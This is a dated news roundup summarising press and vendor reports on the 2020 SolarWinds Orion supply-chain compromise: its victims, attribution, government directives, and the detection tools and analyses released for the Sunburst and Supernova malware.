The attack methods used by the SolarWinds attackers suggest their deep knowledge and understanding of the entire SDLC of SolarWinds. It is possible that the attackers were monitoring the version control server to prepare any necessary changes based on legitimate updates. Or, possibly, they had compromised the build process itself (e.g. a build script) and, during the build, substituted the legitimate SolarWinds.Orion.Core.BusinessLayer.dll with the malicious version.
Ref - Medium
_______________________________________________________________________________________
(January 4, 2021)
How SolarWinds hackers used Supernova malware to target Orion products
The SolarWinds hackers had trojanised versions 2019.4 HF 5 through 2020.2.1 of the SolarWinds Orion platform that was released between March and June 2020. These trojanised software updates were downloaded by as many as 18,000 private and public organizations. Hackers exploited Sunburst’s vulnerability and also used Supernova malware to target their victims.
_______________________________________________________________________________________
(January 4, 2021)
The massive Russian hack was waged inside the U.S.
Russian hackers staged their attacks from servers inside the U.S., sometimes using computers in the same town or city as the victims, according to cybersecurity company FireEye. The attack, attributed to Russia, began with the targeting of the software of IT contractor SolarWinds.
Ref - Axios
_______________________________________________________________________________________
(January 3, 2021)
SUPERNOVA forensic details by using Code Property Graph
The fallout of SolarWinds compromise has resulted in the identification of several new malware families, each with different characteristics and behaviors. Recently, security experts described how weaponized DLL was patched into the SolarWinds Software Development Life Cycle (SDLC) post infiltration. Further, the anti-evasion techniques employed by the APT actor behind this attack were also revealed.
Ref - Security Boulevard
_______________________________________________________________________________________
(January 3, 2021)
SolarWinds was warned in 2017 about the risk of 'catastrophic' breach
A cybersecurity adviser says he had warned SolarWinds of a potential 'catastrophic' hacking attack if the company didn't amp up internal security measures three years before Russians compromised their software. The firm's moving of some operations to Eastern Europe may have exposed it to the massive Russian hack.
Ref - Dailymail
_______________________________________________________________________________________
(January 2, 2021)
The growing danger of Russia-based hack attacks
It now appears that the SolarWinds breach is far broader than first believed. Russia exploited multiple layers of the supply chain to gain access to as many as 250 networks. And all the “Early warning” sensors placed by Cyber Command and the National Security Agency deep inside foreign networks to detect brewing attacks clearly failed.
Ref - New York Times
_______________________________________________________________________________________
(December 31, 2020)
Microsoft’s source code was accessed by SolarWinds hackers
The hacking group behind the SolarWinds compromise was able to break into Microsoft Corp and access some of its source code. It is not clear how much or what parts of Microsoft’s source code repositories the hackers were able to access. However, being able to review the code could offer hackers insight that might help them subvert Microsoft products or services.
Ref - Reuters
_______________________________________________________________________________________
(December 31, 2020)
The SolarWinds attack is a wake call for the U.S.
The recent major SolarWinds hack compromised the Department of Homeland Security, the State Department, the US Treasury, and also impacted several IT giants including Microsoft, Cisco, VMware, FireEye, and many more. The huge investment made by the U.S. in technology, which is a key strength of the US economy, is also making it vulnerable to such attacks.
Ref - Forbes
_______________________________________________________________________________________
(December 30, 2020)
All U.S. federal agencies ordered to update the SolarWinds Orion platform
The CISA has ordered all US federal agencies to update the SolarWinds Orion platform to the latest version by the end of business hours on December 31, 2020. CISA's Supplemental Guidance to Emergency Directive 21-01 demands this from all agencies using Orion versions unaffected in the SolarWinds supply chain attack.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 30, 2020)
The cyberattack on SolarWinds may have started earlier than current estimates
The vice-chairman of the Senate Intelligence Committee claims that the cyberattacks on U.S. government agencies reported in December may have begun earlier than previously believed. According to him, the initial burrowing may have started earlier, however, there is no evidence suggesting that classified government secrets were compromised.
Ref - The Hill
_______________________________________________________________________________________
(December 30, 2020)
It is too early to make attribution for SolarWinds attack
The recent expansive intrusion of the SolarWinds campaign affected over half a dozen government U.S. agencies. Several individuals and agencies, including members of the U.S. Congress, have publicly accused Russia. However, the lack of public evidence gives rise to claims that other actors, even perhaps other countries, may be responsible, a claim made by President Donald Trump as well.
Ref - Recorded Future
_______________________________________________________________________________________
(December 30, 2020)
NSA validates the bug-free version of SolarWinds Orion Platform - CISA issues emergency directive
After the release of the latest version of SolarWinds Orion Platform version 2020.2.1HF2, the National Security Agency (NSA) has examined this latest version and verified that it eliminates the previously identified malicious code. CISA issued an emergency directive to help organizations mitigate the SolarWinds Orion code compromise.
Ref - DHS
_______________________________________________________________________________________
(December 29, 2020)
SolarWinds hackers were looking for victims' cloud data
According to Microsoft, the end goal of the SolarWinds supply chain compromise was to pivot to the victims' cloud assets after deploying the Sunburst/Solorigate backdoor on their local networks. After the initial widespread foothold, the attackers could pick and choose the specific organizations they want to continue operating within.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 29, 2020)
Qualys researchers analyze over 7.54 million vulnerable instances related to FireEye Red Team tools
An analysis of the 7.54 million vulnerable instances indicated that about 99.84% (roughly 7.53 million) are from only eight vulnerabilities in Microsoft’s software. For all these eight vulnerabilities, including CVE-2020-1472 and CVE-2020-0688, Microsoft patches have been available for a while.
_______________________________________________________________________________________
(December 29, 2020)
UAE-based entities targeted in the SolarWinds breach
The National Cybersecurity Council has reported that UAE-based entities were targeted in the SolarWinds cyber-attack and that steps were taken to secure constituencies. In addition, the government body is also taking all precautions and procedures necessary to safeguard the UAE's digital infrastructure, stop cyber-attacks, and ensure quick recovery from such incidents.
Ref - AlKhaleej Today
_______________________________________________________________________________________
(December 29, 2020)
NETRESEC updates its tool to identify security products installed on Trojanized SolarWinds Orion deployments
NETRESEC’s free tool SunburstDomainDecoder (v1.7) can be used to identify the endpoint protection applications that are installed on trojanized SolarWinds Orion deployments. The security application info is extracted from DNS queries for "avsvmcloud[.]com" subdomains, which is used by SUNBURST as a beacon and C2 channel.
_______________________________________________________________________________________
(December 28, 2020)
Microsoft shares information for partners on using Microsoft 365 Defender to protect against Solorigate
Microsoft has published a comprehensive guide to provide information to customers and partners about securing their environment and answering their questions related to the recent SolarWinds attacks. It also provides additional links and information for Microsoft partners.
_______________________________________________________________________________________
(December 28, 2020)
More supply chain attacks like SolarWinds expected in 2021
SolarWinds, Vietnam Government Certification Authority, Able Desktop, GoldenSpy and Wizvera VeraPort are some of the prominent Supply chain attacks the world has observed in recent times. Now, almost all security researchers agree that more such supply-chain attacks will happen, especially attacks on the software development lifecycle and that security teams need to sharpen their strategies.
Ref - SCMagazine
_______________________________________________________________________________________
(December 28, 2020)
CISA's PowerShell-based tool Sparrow can detect malicious activities related to SolarWinds attack
SolarWinds threat actors were found actively using stolen credentials and access tokens to target Azure customers. CISA's Cloud Forensics team has prepared a malicious activity detection tool dubbed Sparrow, which can check for compromised Azure accounts. This tool can check the unified Azure/M365 audit log for known IoCs, provide a list of Azure AD domains, and also check for Azure service principals and their Microsoft Graph API permissions to discover potential malicious activity.
_______________________________________________________________________________________
(December 28, 2020)
A different threat actor may have used Supernova malware, exploiting a new zero-day vulnerability
It has been discovered that the Supernova malware is designed to exploit a previously unknown vulnerability, tracked as CVE-2020-10148, which can allow a remote attacker to execute API commands. This zero-day flaw may have been used by a second (unrelated to the previous) threat actor to target the SolarWinds Orion platform.
_______________________________________________________________________________________
(December 28, 2020)
Using ShiftLeft’s Code Property Graph to explore SolarWinds Sunburst backdoor
By reversing the binaries for Sunburst malware, several rough edges were discovered in the SolarWinds espionage operation. It has been revealed that the attacker employed FNV-1a (Fowler Noll Vo) + XOR class of hash algorithms to obfuscate all of the hardcoded literals in the codebase. A navigation workflow of the Sunburst malware has also been disclosed.
_______________________________________________________________________________________
(December 28, 2020)
NGSAST policy for Sunburst backdoor detection
A code repository has been put up on GitHub, which provides information about the building blocks of NGSAST Policy for Sunburst backdoor detection. These code snippets can be used to detect the ShiftLeft backdoor patterns.
Ref - GitHub
_______________________________________________________________________________________
(December 28, 2020)
Microsoft shares information on using Microsoft 365 Defender to protect against Solorigate
Microsoft has published a comprehensive guide for security operations and incident response teams. This guide provides details about using Microsoft 365 Defender to identify, investigate, and respond to the recent Solorigate attack targeting the SolarWinds Orion platform.
_______________________________________________________________________________________
(December 26, 2020)
SolarWinds releases updated advisory for new SUPERNOVA malware
SolarWinds has released an updated advisory for the additional SuperNova malware discovered to have been distributed through the company's network management platform.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 26, 2020)
SolarWinds breach highlights several corporate governance gaps
The SolarWinds breach poses several urgent cybersecurity challenges for CIOs Boards. It highlights the Boards’ ability to monitor cyber risks, which is hampered by a lack of director expertise, outdated and incomplete committee charters, and highly diffused work responsibilities. Insufficient resources, weak oversight, and poor coordination makes the matter worse.
Ref - Forbes
_______________________________________________________________________________________
(December 26, 2020)
Security advisory to fix newly found remote command execution flaw in SolarWinds Orion platform
A security advisory has been released to fix a new vulnerability (CVE-2020-10148) that was probably targeted by a second hacker group to execute remote API commands on the targeted systems. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance.
Ref - CERT
_______________________________________________________________________________________
(December 25, 2020)
CrowdStrike releases a free Azure security tool after SolarWinds attack
CrowdStrike has released a free CrowdStrike Reporting Tool for Azure (CRT) tool to help administrators analyze their Microsoft Azure environment and see what privileges are assigned to third-party resellers and partners. The company was recently notified by Microsoft that during SolarWinds attacks, threat actors had attempted to read the company's emails through compromised Microsoft Azure credentials.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 25, 2020)
A deep forensics investigation of SolarWinds supply-chain attack
A deep forensics investigation regarding SolarWinds supply chain attack has revealed another set of new details. The attackers had breached the SolarWinds source code management system in October 2019, and since then they not only deeply learned and tampered with the source code of SolarWinds but also learned the topology of their networks and internal development domain names to minimize the risk of getting noticed by security teams.
Ref - Security Boulevard
_______________________________________________________________________________________
(December 25, 2020)
SolarWinds issues urgent security fix
SolarWinds has updated its flagship Orion software, 11 days after revealing a major breach. On 13 December, it disclosed that Orion had been compromised, and used by suspected Russian attackers as a means to penetrate US government networks and companies including Intel. It was later revealed that the product had also been compromised by malware from a suspected second perpetrator, adding a separate backdoor.
Ref - BBC
_______________________________________________________________________________________
(December 25, 2020)
Solorigate attack affected critical infrastructure, including the power industry
The recent SolarWinds hacking attack that infected numerous government agencies and tech companies with malicious SolarWinds software has also infected more than a dozen critical infrastructure companies in the electric, oil, and manufacturing industries that were also running the software.
Ref - The Intercept
_______________________________________________________________________________________
(December 25, 2020)
Experts who wrestled with SolarWinds hackers say cleanup could take months - or longer
The attackers had not only managed to break back in a common enough occurrence in the world of cyber incident response but they had sailed straight through to the client’s email system. They even managed to get past the recently refreshed password protections without any trouble. This indicates that hackers were smart and sophisticated in nature.
Ref - Reuters
_______________________________________________________________________________________
(December 24, 2020)
CISA’s tool can detect malicious activity in the Azure/M365 environment impacted by SolarWinds attack
CISA has created a free tool for detecting unusual and potentially malicious activity that threatens users and applications in an Azure/Microsoft O365 environment. The tool is intended for use by incident responders and is focused on the recent identity- and authentication-based attacks seen across multiple sectors. This tool comes after Microsoft disclosed that SolarWinds threat actors were actively using stolen credentials and access tokens to target Azure customers.
Ref - US-CERT
_______________________________________________________________________________________
(December 24, 2020)
No taxpayer data is compromised by the recent SolarWinds breach
The internal watchdog at the IRS said in a letter that there is no evidence suggesting taxpayer information was exposed as a result of hackers breaching the agency's network. The IRS is conducting additional forensic reviews and network log analysis to collect more information.
Ref - FCW
_______________________________________________________________________________________
(December 24, 2020)
SolarWinds SUNBURST Backdoor: Inside the stealthy APT campaign
On December 13, FireEye shared valuable details on the breach about how threat actors compromised SolarWinds Orion software update distribution mechanism to spread malicious code to organizations using the software.
Ref - Varonis
_______________________________________________________________________________________
(December 24, 2020)
Suspected Russian attackers used Microsoft vendors to target customers
The suspected Russian hackers behind the SolarWinds cyber-attack leveraged reseller access to Microsoft Corp services to penetrate targets that had no compromised network software from SolarWinds Corp. While updates to SolarWinds’ Orion software was previously the only known point of entry, security company CrowdStrike Holdings Inc. stated that the hackers had also won access to the vendor that sold it Office licenses and used that to try to read CrowdStrike’s email.
Ref - Reuters
_______________________________________________________________________________________
(December 24, 2020)
Microsoft alerted CrowdStrike when hackers' first attempted break-in
During the course of investigating the SolarWinds breach, CrowdStrike says Microsoft uncovered an attempt from unidentified hackers to read emails linked with the company. The attackers tried to access emails, however, CrowdStrike said that it does not use Office 365 email as part of its secure IT architecture.
Ref - Cyberscoop
_______________________________________________________________________________________
(December 24, 2020)
Why does the SolarWinds hack matter so much?
Multiple networks have been penetrated in the recent SolarWinds breach, and now it is very expensive and difficult to secure all the systems. President Trump's former homeland security officer stated that it could be years before the networks are secure again. With access to government networks, hackers could even destroy or alter data, and impersonate legitimate people.
Ref - Business Insider
_______________________________________________________________________________________
(December 24, 2020)
SolarWinds attackers targeted local governments as well
CISA has disclosed that the SolarWinds hack not only affected key federal agencies, but it also targeted the computer systems used by state and local governments, critical infrastructure entities, and other private sector organizations. Other networking software may have been compromised.
Ref - NPR
_______________________________________________________________________________________
(December 24, 2020)
The massive data breach may have been discovered due to an 'unforced error' of attackers
Experts investigating the massive data breach related to SolarWinds said that the attackers were discovered possibly because they took more aggressive steps with calculated risk, months after their initial penetration. This led to a possible "unforced error" as they tried to expand their access within the network they had penetrated earlier without detection.
Ref - CNN
_______________________________________________________________________________________
(December 23, 2020)
Trustwave’s action response to the FireEye data breach & SolarWinds Orion compromise
This blog post provides information about Trustwave’s response to the FireEye tools breach and SolarWinds Orion platform compromise, as well as additional clarifications to Trustwave’s non-use of affected versions of SolarWinds Orion.
Ref - Trustwave
_______________________________________________________________________________________
(December 23, 2020)
Understanding & detecting the SUPERNOVA Webshell trojan
The sophisticated nature of the SolarWinds compromise has resulted in a flurry of new malware families, each with different characteristics and behaviors.
Ref - Sentinel One
_______________________________________________________________________________________
(December 23, 2020)
SolarWinds victims need to report data breaches - UK privacy watchdog
U.K.'s Information Commissioner's Office (ICO) has warned the victim organizations of the SolarWinds attack that they are required to report data breaches within three days after their discovery. Organizations using the SolarWinds Orion IT management platform are asked to check if they are using the malicious builds - i.e., versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1. Affected organizations are required to inform the ICO within 72 hours of discovering the breach.
_______________________________________________________________________________________
(December 23, 2020)
The motive of SolarWinds attack could be beyond just espionage
Some experts suggest that the scope of SolarWinds attack extended beyond typical cyber-espionage, as the attackers dispersed their malicious code widely, even to potential targets with no obvious intelligence value. The attack may be extending to the “key utilities” in the U.S., and hackers may be still operating within breached networks, with the ability to conduct a more damaging attack, like deleting data or shutting down systems.
_______________________________________________________________________________________
(December 23, 2020)
How to Detect and Search for SolarWinds IOCs in LogRhythm
LogRhythm Labs has gathered up the indicators of compromise (IOCs) from CISA, Volexity, and FireEye associated with the recent SolarWinds supply chain attack and made them available in the GitHub repository.
Ref - LogRhytm
_______________________________________________________________________________________
(December 23, 2020)
US in talks with intelligence alliance partners for sharing intelligence and taking joint actions
White House National Security Adviser Robert O'Brien held a call with his counterparts in an international intelligence-sharing alliance to discuss the suspected Russian cyberattack on US government agencies. He also put a proposal for a joint statement condemning the breach with other members of the so-called Five Eyes alliance, which includes the US, UK, Canada, Australia, and New Zealand.
_______________________________________________________________________________________
(December 23, 2020)
Five solution providers targeted with second-stage attacks
Five Solution Provider companies, namely Deloitte, Stratus Networks, Digital Sense, ITPS, and Netdecisions were specific targets of second-stage attacks during the SolarWinds attacks. Experts said that these companies should consider themselves compromised and conduct a full incident response investigation.
_______________________________________________________________________________________
(December 23, 2020)
Millions of Devices Affected by Vulnerabilities Used in Stolen FireEye Tools
More than 7.5 million vulnerable instances have been identified that are exposed to the vulnerabilities associated with the stolen FireEye tools and compromised versions of the SolarWinds Orion product. These vulnerable devices include around 5.3 million unique assets, belonging to more than 15000 customers.
_______________________________________________________________________________________
(December 22, 2020)
An analysis of SolarWinds Orion supply-chain attack
Disconnecting or turning off affected Orion devices is the only known mitigation measure currently available. CISA advises affected agencies to forensically image system memory and/or host operating systems hosting all instances of affected SolarWinds Orion versions and to analyze stored network traffic for indicators of compromise (IoCs).
Ref - Logpoint
_______________________________________________________________________________________
(December 22, 2020)
Sunburst detection and investigation with Trend Micro products
This article covers various Trend Micro product detection and protection patterns, rules, and filters that have been deployed to help organizations investigate and mitigate additional risk against threats associated with this campaign as well as highlighting Trend Micro technology that can assist in the investigation.
Ref - Trend Micro
_______________________________________________________________________________________
(December 22, 2020)
The SolarWinds cyberattack: What SLTTs need to know
This cyber-attack is exceptionally complex and continues to evolve. The attackers randomized parts of their actions making traditional identification steps such as scanning for known indicators of compromise (IOC) of limited value.
Ref - CIS
_______________________________________________________________________________________
(December 22, 2020)
SolarWinds hack breaches Treasury Department’s top levels
The Russian hackers behind the attack broke into the email system used by top officials at the Treasury Department in July. The Treasury Department ranks among the most highly protected corners of the government because of its responsibility for market-moving economic decisions, communications with the Federal Reserve, and economic sanctions against adversaries.
Ref - NYTimes
_______________________________________________________________________________________
(December 22, 2020)
Analysis of a supernova SolarWinds .NET Webshell
In the IOCs listed by FireEye as part of this investigation related to supply-chain compromise of SolarWinds, a .NET webshell named SUPERNOVA was identified. There was no supplemental analysis as to its method of operation or any behavioral indications of this webshell being present in an environment.
Ref - GuidePoint Security
_______________________________________________________________________________________
(December 22, 2020)
SolarWinds victims discovered after breaking the Sunburst malware DGA
Security researchers have shared lists of organizations where threat actors deployed Sunburst/Solarigate malware. To build the list of victims infected with the Sunburst backdoor via the compromised update mechanism of the SolarWinds Orion IT management platform, the researchers decoded a dynamically generated part of the C2 subdomain for each of the compromised devices.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 21, 2020)
SolarWinds incident is a wakeup call for federal cybersecurity
CIOs and CISOs have spent a long week trying to get a handle on the impact on their networks, systems, and data from the SolarWinds cyber attack. While the details of the cyber breach continue to emerge and the agencies impacted come to light, Congress and the incoming administration of President-elect Joe Biden are promising to make 2021 an even busier year for CIOs and CISOs.
Ref - Federal News Network
_______________________________________________________________________________________
(December 21, 2020)
SolarWinds hack: Microsoft leverages threat intelligence to identify patterns and new indicators
As part of the ongoing security processes of the SolarWinds attack, Microsoft has been leveraging threat intelligence and monitoring for new indicators that could signal attacker activity. There are two categories of anomalies detected, in which the first is SAML tokens being presented for access, and the second is Microsoft 365 API access patterns in a tenant.
Ref - Microsoft
_______________________________________________________________________________________
(December 21, 2020)
Responding to the SolarWinds Software Compromise in Industrial Environments
Far fewer than the 18,000 organizations had followed on activity from the adversary; public data currently supports the number to be in the dozens though the situation is evolving.
Ref - Dragos
_______________________________________________________________________________________
(December 21, 2020)
What We Have Learned So Far about the “Sunburst”/SolarWinds Hack
Based on SolarWind’s data, 33,000 organizations use Orion’s software, and 18,000 were directly impacted by this malicious update.
Ref - Fortinet
_______________________________________________________________________________________
(December 21, 2020)
List of organizations affected with Sunburst malware released online
Multiple security researchers and research teams have published over the weekend lists ranging from 100 to 280 organizations that installed a trojanized version of the SolarWinds Orion platform. The biggest names on this list include the likes of Cisco, SAP, Intel, Cox Communications, Deloitte, Nvidia, Fujitsu, Belkin, Amerisafe, Lukoil, Rakuten, Check Point, Optimizely, Digital Reach, and Digital Sense.
Ref - ZDNet
_______________________________________________________________________________________
(December 21, 2020)
Another SUPERNOVA backdoor discovered in SolarWinds cyberattack
While analyzing the artifacts from the SolarWinds Orion supply-chain attack, security researchers discovered another backdoor. Named SUPERNOVA, the malware is a webshell planted in the code of the Orion network and applications monitoring platform. This is likely the work of a second threat actor, and it enabled adversaries to run arbitrary code on machines running the trojanized version of the software
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 21, 2020)
A second threat group exploited SolarWinds systems
Security researchers have discovered a second threat actor, dubbed CosmicGale aka Supernova that has exploited the SolarWinds software to plant malware on corporate and government networks. On infected networks, the Solorigate malware (originally detected malware) would ping its creators and then download a second stage-phase backdoor trojan named Teardrop that allowed attackers to start a hands-on-keyboard session, also known as a human-operated attack.
Ref - ZDNet
_______________________________________________________________________________________
(December 21, 2020)
Intel and Nvidia were targeted in the SolarWinds attack
Intel and Nvidia have joined the growing list of companies that have been swept up in the massive hacking campaign perpetrated through SolarWinds’ Orion network monitoring software. The Santa Clara, Calif.-based chipmakers said in separate statements that they are investigating the impact of downloading a software update containing malicious code for SolarWinds Orion
Ref - CRN
_______________________________________________________________________________________
(December 21, 2020)
Detecting SUNBURST/Solarigate activity in retrospect with Zeek – a practical example
The threat actors who created SUNBURST went to extraordinary lengths to hide Command-and-Control (C2) traffic by mimicking the nature of communication patterns used by legitimate software within the SolarWinds package.
Ref - Security Boulevard
_______________________________________________________________________________________
(December 21, 2020)
The SolarWinds attackers could have targeted federated authentication
An attacker-modified update to the SolarWinds Orion network management product is likely not the only way Russian attackers infiltrated networks. Specifically, US agencies are investigating incidents in which activity indicating abuse of Security Assertion Markup Language (SAML) tokens consistently with this adversary's behavior is present.
Ref - Dark Reading
_______________________________________________________________________________________
(December 21, 2020)
The SolarWinds attack also affected a hospital and a university
It has been revealed that the suspected Russian hackers behind breaches at U.S. government agencies also gained access to major U.S. technology and accounting companies, at least one hospital, and a university. Along with access to tech companies, the attackers also had access to the California Department of State Hospitals and Kent State University.
Ref - WSJ
_______________________________________________________________________________________
(December 20, 2020)
Deloitte on the list of victims affected by the SolarWinds hack
It has been revealed that Deloitte, a British multinational professional services network, unwittingly downloaded software linked to a massive hack that targeted dozens of US government departments. The consulting firm installed SolarWinds Orion products, after which it was forced to take steps to protect itself from any risks.
Ref - Telegraph
_______________________________________________________________________________________
(December 20, 2020)
Around 50 firms are impacted by the SolarWinds massive breach
The cyber-security firm that identified the large-scale hacking of US government agencies says it genuinely impacted around 50 organizations. In addition, some 18,000 organizations had malicious code in their networks, out of which 50 suffered major breaches. The U.S. Secretary of State has blamed Russia for the hack.
Ref - BBC
_______________________________________________________________________________________
(December 19, 2020)
The SolarWinds cyberattack: The hack, the victims, and what we know
Since the SolarWinds supply chain attack was disclosed, there has been a whirlwind of news, technical details, and analysis released about the hack. Because the amount of information that was released in such a short time is definitely overwhelming, so the news agency published a roundup of this week's SolarWinds news.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 19, 2020)
Hackers conducted a test run of SolarWinds breach a year ago
Hackers who breached federal agency networks appear to have conducted a test run of their broad espionage campaign last year. The hackers distributed malicious files from the SolarWinds network in October 2019, five months before previously reported files were sent to victims through the company’s software-update servers.
Ref - Yahoo
_______________________________________________________________________________________
(December 19, 2020)
Russia is behind SolarWinds operation: US Secretary of State
US Secretary of State Mike Pompeo has blamed Russia for the recent attacks on U.S. federal agencies and private organizations in what is being described as the worst-ever cyber-espionage attack on the US government. He did not provide details about the alleged links to Moscow, and Russia has denied any involvement in the attack.
Ref - BBC
_______________________________________________________________________________________
(December 19, 2020)
Sunburst malware used encoded DNS requests to talk to the C&C server
In the initial phases of the recent SolarWinds hack, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer. If the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server.
Ref - Securelist
_______________________________________________________________________________________
(December 18, 2020)
Detecting SUNBURST Malware with Panther
Panther has published an addition to our open-source detections to actively track malware callbacks to the SUNBURST Indicators of Compromise (IoCs) identified by FireEye.
Ref - Panther
_______________________________________________________________________________________
(December 18, 2020)
Internal machines used by Cisco researchers were targeted in SolarWinds attack
Internal machines used by Cisco researchers were targeted via SolarWinds as the impact of the colossal hacking campaign on the tech sector becomes apparent. Roughly two dozen computers in a Cisco lab were compromised through malicious updates to SolarWinds’ Orion network monitoring platform. In this case, the perpetrators didn't just sneak in, but they broke in and covered their tracks by manipulating code, according to a cyber security expert familiar with the case.
Ref - CRN
_______________________________________________________________________________________
(December 18, 2020)
A Telecom organization and Fortune 500 company were breached in SolarWinds attack
A large telecommunications organization, a Fortune 500 company, and multiple government agencies are among the recent breaches to emerge as a result of the SolarWinds supply chain hack. SolarWinds estimates that between March and June, roughly 18,000 user organizations downloaded updates of its Orion software that Russian APT actors allegedly corrupted with Sunburst backdoor malware.
Ref - SCMagazine
_______________________________________________________________________________________
(December 18, 2020)
A VMware flaw could be a vector in SolarWinds attack
The U.S. National Security Agency stated that Russian state-sponsored malicious cyber actors are exploiting a vulnerability in VMware Access and VMware Identity Manager products, allowing the actors to access the protected data and abuse federated authentication. VMware released a software update to plug the security hole (CVE-2020-4006) on Dec. 3 and said it learned about the flaw from the NSA.
Ref - Krebsonsecurity
_______________________________________________________________________________________
(December 18, 2020)
Cozy Bear is suspected to be behind the SolarWinds breach
In the recent SolarWinds attacks, according to people familiar with the matter, the culprit is one of the most persistent and savvy hacking groups on the planet: the Russian government-backed APT29, also known as Cozy Bear. Although, the U.S. government has not formally blamed any group for the SolarWinds breach.
Ref - Cyberscoop
_________________________________________________________________________________
(December 18, 2020)
Sunburst’s C2 unveiled additional SolarWinds victims
Examining the backdoor’s DNS communications led researchers to identify two organizations: a government agency and a big U.S. telco, that were flagged for further exploitation in the spy campaign. Further exploitation by the hacker UNC2452 involves installing more malware, installing persistence mechanisms, and exfiltrating data.
Ref - Threatpost
_______________________________________________________________________________________
(December 18, 2020)
A small number of UK organizations affected by SolarWinds hack
Suspected Russian hackers have compromised a small number of organizations in Britain after hijacking software updates issued by the U.S. IT firm SolarWinds Corp. Numbers in the UK are small and the organizations are not in the public sector, according to a UK security source.
Ref - Reuters
_______________________________________________________________________________________
(December 18, 2020)
SolarWinds hackers also breached a U.S. cable firm and a county government in Arizona
Suspected Russian hackers accessed the systems of a U.S. internet provider and a county government in Arizona as part of a sprawling cyber-espionage campaign disclosed this week, according to an analysis of publicly-available web records.
Ref - Reuters
_______________________________________________________________________________________
(December 18, 2020)
SolarWinds attack is an act of recklessness - Microsoft president
Out of the 18,000 organizations that downloaded a backdoored version of the software from SolarWinds, around 0.2 percent were targeted in a follow-on hack, that used the backdoor to install a second-stage payload. The largest populations receiving stage two include tech companies, government agencies, and think tanks/NGOs. The vast majority, 80 percent, of these 40 chosen ones were located in the US. This act of recklessness has created a serious technological vulnerability for the United States and the world.
Ref - Arstechnica
_______________________________________________________________________________________
(December 18, 2020)
A massive hack attack should be considered as an act of war: US lawmakers
Several lawmakers in the U.S. are raising questions about whether the recent attack on the federal government widely attributed to Russia constitutes an act of war. This attack may represent one of the biggest cyberattacks in U.S. history. Questions have been raised about the fact that the U.S. has no clear cyber warfare strategy.
Ref - The Hill
_______________________________________________________________________________________
(December 18, 2020)
FBI, CISA confirms the US govt hacks
The compromise of multiple US federal networks following the SolarWinds breach was officially confirmed for the first time in a joint statement released earlier by the FBI, DHS-CISA, and the Office of the Director of National Intelligence (ODNI).
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 18, 2020)
Microsoft’s systems were vulnerable to SolarWinds hack
Microsoft Corp. said its systems were exposed to the malware used in the Russia-linked hack that targeted U.S. states and government agencies. Microsoft is also a customer of SolarWinds, and the company said that it found malicious code related to the cyber-attack in its own environment, which was isolated and removed. However, there were no pieces of evidence of access to production services or customer data.
Ref - Bloomberg
_______________________________________________________________________________________
(December 18, 2020)
More hacking attacks unearthed as officials alert the U.S. government
Federal officials issued an urgent warning Thursday that the hackers who were working for a foreign government and penetrated deep into government systems had used a wider variety of techniques in their cyber-offensive and they warned that the hacking was a grave risk to the federal government.
Ref - NYTimes
_______________________________________________________________________________________
(December 17, 2020)
Additional Analysis into the SUNBURST Backdoor
An interesting observation was the check for the presence of SolarWinds’ Improvement Client executable and it’s version “3.0.0.382”. The ImprovementClient is a program that can collect considerable information such as the count of Orion user accounts by authentication method and data about devices and applications monitored.
Ref - McAfee
_______________________________________________________________________________________
(December 17, 2020)
SolarWinds supply chain-type attacks demand global cybersecurity response
Brad Smith, the President of Microsoft, has provided some clarifications as well as recommendations regarding the recent attacks. This latest cyber-assault is effectively an attack on the United States and its government and other critical institutions, including security firms. It illuminates the need for sharing information and best practices and coordinating not just on cybersecurity protection but on defensive measures and responses.
Ref - Microsoft
_______________________________________________________________________________________
(December 17, 2020)
The US establishes 'Cyber Unified Coordination Group' to respond to SolarWinds attack
A joint statement yesterday from the US FBI, CISA, and ODNI says that the Government has invoked Presidential Policy Directive (PPD) 41 to establish a Cyber Unified Coordination Group to coordinate a whole-of-Government response to the Russian cyber operation that exploited SolarWinds' Orion platform.
Ref - TheCyberWire
_______________________________________________________________________________________
(December 17, 2020)
The SolarWinds hack targeted government agencies, critical infrastructure, and private sector organizations
The Cybersecurity and Infrastructure Security Agency (CISA) is aware of the compromises of U.S. government agencies, critical infrastructure entities, and private sector organizations by an APT actor beginning in at least March 2020. This APT actor has demonstrated patience, operational security, and complex tradecraft in these intrusions.
Ref - US-CERT
_______________________________________________________________________________________
(December 17, 2020)
Attackers used unknown tactics to penetrate the U.S government networks
Federal investigators presented evidence of previously unknown tactics for penetrating government computer networks. Attackers first gained access to the think tank’s networks using multiple tools, backdoors, and malware implants and exploited a vulnerability in Microsoft’s Exchange Control Panel software.
Ref - Washington Post
_______________________________________________________________________________________
(December 17, 2020)
SolarWinds SUNBURST backdoor assessment
The SolarWinds Orion Platform is the market leader for network monitoring platforms with SolarWinds having over 275.000 customers in 190 countries and providing network monitoring for 400 of the Fortune 500, the US government, and other high profile organizations.
Ref - Hornet Security
_______________________________________________________________________________________
(December 17, 2020)
Nuclear weapons agency breached in SolarWinds attack
The Energy Department and National Nuclear Security Administration (NNSA), which maintains the U.S. nuclear weapons stockpile, have evidence that hackers accessed their networks as part of an extensive espionage operation that has affected at least half a dozen federal agencies. The hackers were able to access the networks belonging to a core part of the U.S. national security enterprise.
Ref - Politico
_______________________________________________________________________________________
(December 17, 2020)
Hacker behind SolarWinds attack breached the US nuclear weapons agency
The hacking group behind the SolarWinds compromise also hacked the networks of the US nuclear weapons agency. The federal investigators have found evidence of hackers gaining access to US DOE and NNSA networks as part of the ongoing US govt compromise attack campaign.
Ref - Bleeping Computer
_______________________________________________________________________________________
(December 17, 2020)
The sophistication and scope of SolarWinds attack
The suspected Russian hack that compromised parts of the U.S. government was executed with a scope and sophistication that has surprised even veteran security experts and exposed a potentially critical vulnerability in America’s technology infrastructure. The operation is part of a broader, previously undetected cyber-espionage campaign that may stretch back years.
Ref - WSJ
_______________________________________________________________________________________
(December 17, 2020)
Microsoft confirmed that it was breached in SolarWinds supply chain attack
